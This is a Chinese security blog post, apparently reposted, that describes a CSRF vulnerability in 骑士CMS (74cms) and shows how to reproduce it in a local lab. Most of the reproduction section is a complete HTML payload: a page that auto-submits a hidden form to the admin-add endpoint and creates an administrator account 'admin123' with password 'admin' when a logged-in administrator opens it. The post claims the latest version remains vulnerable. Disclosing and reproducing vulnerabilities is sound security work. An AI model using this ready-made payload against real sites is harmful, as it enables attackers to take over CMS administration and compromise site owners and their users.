骑士CMS的CSRF利用
2022-8-15 00:9:44 Author: 白帽子程序员(查看原文) 阅读量:19 收藏

【白帽子程序员】,一线网络安全和程序设计的交流平台

回复“电子书”web渗透、CTF电子书;

回复“视频教程”获取渗透测试视频教程:

回复“CTF视频教程”获取CTF视频教程;  

回复“python视频教程”python教学视频;        

描述

由于存在CSRF漏洞,攻击者可以通过诱导管理员点击恶意页面从而添加管理员账户的效果(测试最新版依旧存在该漏洞)。

环境准备

官网下载最新版本进行安装(PHPstudy集成环境直接部署)

复现

①本地搭建好环境测试之后,登录后台,此时后台只有一个管理员

②通过诱导登陆了管理员的终端点击该payload:http://10.0.0.3:90/payload.html页面,即可完成添加新的管理员

③payload 代码如下:(通过提交至该url:/index.php?m=admin&c=admin&a=add 添加一个用户名为admin123,密码为admin的管理员)

<!DOCTYPE html>

<html>

<head>

<title> CSRF </title>

<script type="text/javascript">

function exec1(){

document.getElementById('form1').submit();

}

</script>

</head>

<body onload="exec1();">

<form id="form1" action="http://10.0.0.3:90/74cms2/index.php?m=admin&c=admin&a=add" method="POST">

<input type="hidden" name="username" value="admin123" />

<input type="hidden" name="email" value="[email protected]" />

<input type="hidden" name="password" value="admin" />

<input type="hidden" name="repassword" value="admin" />

<input type="hidden" name="role_id" value="1" />

</form>

</body>

</html>

验证

看到后台管理处已经添加了   admin123  账号

进行登录验证

本文作者:D_P, 转载请注明来自FreeBuf.COM

关注公众号【白帽子程序员】回复: hw 获取HW学习资料。

HW相关资料

HW现场处置工作情况

-END


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg3Mjc0MDQ2Nw==&mid=2247489079&idx=1&sn=0863559380718e17fe54d098e06eeebe&chksm=ceebf52bf99c7c3ddf85514938c0a753bde1c309f1f46d89073cfca573a194a367d5b9d38b19#rd
如有侵权请联系:admin#unsafe.sh